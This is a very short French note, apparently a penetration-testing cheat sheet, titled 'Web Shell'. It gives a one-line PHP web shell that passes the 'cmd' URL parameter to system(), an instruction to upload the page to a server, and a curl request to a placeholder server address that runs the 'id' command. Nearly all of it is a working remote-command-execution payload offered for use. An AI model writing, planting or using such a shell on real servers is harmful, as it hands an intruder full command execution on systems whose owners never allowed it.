Web Shell

Uploader la page

<?php echo 'Shell: ';system($_GET['cmd']); ?>

Lancer la commande 'id' sur le server.

curl http://IPSERVER/cmd.php?cmd=id